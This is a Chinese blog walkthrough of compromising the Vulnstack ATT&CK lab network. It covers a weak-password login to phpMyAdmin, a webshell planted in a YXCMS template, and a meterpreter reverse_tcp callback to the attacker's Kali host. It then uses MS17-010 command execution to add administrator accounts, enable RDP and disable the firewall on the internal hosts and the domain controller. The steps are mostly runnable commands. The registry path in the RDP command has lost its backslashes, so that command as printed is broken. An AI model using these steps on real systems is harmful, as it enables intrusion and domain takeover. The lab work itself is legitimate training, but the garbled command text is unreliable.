栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

ATT&CK实战系列 (一)

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

ATT&CK实战系列 (一)

靶场下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

攻击机:kali:172.26.16.122

255.255.254.0

win7双网卡 外网连接kali:172.26.16.123

    255.255.254.0

      内网网卡:192.168.52.143

Win2003:内网ip 192.168.52.141

   255.255.255.0

Win2008:内网IP 192.168.52.138

255.255.255.0

配置好环境

第一步 使kali机扫描内网IP

然后得知 win7IP是172.26.16.123

然后nmap -Pn -sT 172.26.16.123

得知打开了80端口 然后使用浏览器访问 172.26.16.123

然后发现mysql数据库 于是弱密码root root发现连接成功 判断有phpmyadmin

判断有phpmyadmin 于是使用刚才的用户密码登录

于是发现 newyxcms 

百度一下yxcms的后台登陆页面,顺便百度下、一下关于yxcms的漏洞

然后访问http://172.26.16.123/yxcms

然后发现提示 给了访问地址与密码 于是访问进行访问登录

于是发现前台模板文件

进入在文件里写一句话木马        echo "cmd"是方便在页面发现马子文件路径

发现修改的文件了 然后进行复制连接 使用蚁剑进行连接webshell

连接成功了

然后使用kali机生成一个msf文件使用蚁剑进行上传

然后运行木马

msfconsole

 use exploit/multi/handler

 set payload windows/x64/meterpreter/reverse_tcp

 set LHOST 172.26.16.122

 Set LPORT 7744

下一步有返回后就开始提权

然后再这里通过蚁剑添加一个win7用户

并加到管理员组

然后 netstat -an查看开发端口

然后发现没有打开3389 下面使用蚁剑打开3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal""Server /v fDenyTSConnections /t REG_DWORD /d 00000000/f

然后netstat -an 

打开之后使用kali远程登录

然后在win7里面ipconfig 发现内网IP 192.168.52.143

添加路由,挂socks4a代理

然后设置通往192.168.52.0/24的路由

这样,我们就可以通过msf 进入.52网段

设置代理

search socks

use auxiliary/server/socks_proxy

set srvhost 172.26.16.122 本机的代理地址

set version 4a

run

修改proxychains配置文件

然后开始进攻192.168.52.141 域用户

然后使用代理扫描192.168.52.141

得知开启了445端口

下面目标  渗透win2003(远程登录)

由nmap看到开放445端口

尝试永恒之蓝攻击win2003

 use exploit/windows/smb/ms17_010_psexec          //windows 2003   的攻击模块

然后设置 rhosts

然后进入

use auxiliary/admin/smb/ms17_010_command

use auxiliary/admin/smb/ms17_010_command

show options

set rhosts 192.168.52.141

set command net user xiao lbb1111.. /add  #添加用户

run  #成功执行

set command net localgroup administrators xiao /add  #管理员权限

run  #成功执行

set command 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  //开启3389端口

run #成功执行

然后代理nmap扫描看看3389端口开了吗

这里已经打开了 然后使用代理远程进行连接

这里刚才创建的xiao用户不是域用户 只是一个普通的管理员用户 所以不能以域用户登录

然后拿下第二台

然后开始渗透地三台机子

通过代理 nmap -Pn -sT 192.168.52.0/24

得知第三台域控 IP 192.168.52.138

 然后代理扫描发现没有开启 3389 但是开启了135 与445

然后进入use auxiliary/admin/smb/ms17_010_command   里添加用户 并添加到管理员组

use auxiliary/admin/smb/ms17_010_command

show options

set rhosts 192.168.52.138

set command net user xiao lbb1111.. /add  #添加用户

run  #成功执行

set command net localgroup administrators xiao /add  #管理员权限

run  #成功执行

set command 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  #开启3389端口

run #成功执行

netsh advfirewall set allprofiles state off #关闭防火墙

run#成功执行

然后 set command netstat -an 查看3389 端口打开吗

打开了就可以通过代理远程登录了

然后使用代理登录192.168.52.138

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/675464.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号